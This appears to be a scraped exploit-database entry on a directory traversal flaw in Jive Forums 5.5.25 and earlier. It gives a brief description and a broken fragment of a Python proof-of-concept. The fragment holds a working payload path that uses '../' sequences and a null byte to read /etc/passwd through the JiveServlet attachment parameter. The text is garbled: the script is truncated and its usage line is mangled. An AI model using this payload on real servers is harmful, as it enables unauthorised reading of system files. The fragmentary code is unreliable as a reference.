Jive Forums Directory Traversal Vulnerability

Jive Forums is a recognized online community. A directory traversal vulnerability exists in Jive Forums version 5.5.25 and earlier. An attacker can exploit ... /... / / jump to access system files outside of the web directory...

Jive Forums 5.5.25 - Directory Traversal

Jive Forums 5.5.25 - Directory Traversal ''' JiveForums " print " Usage: %s http://localhost /jiveforums/" % sys.argv0 sys.exit payload = 'servlet/JiveServlet?attachImage=true&attachment=/.././.././.././.././.././.././.././../etc/./passwd%00&contentType=image%2Fpjpeg' print "+ Trying to request...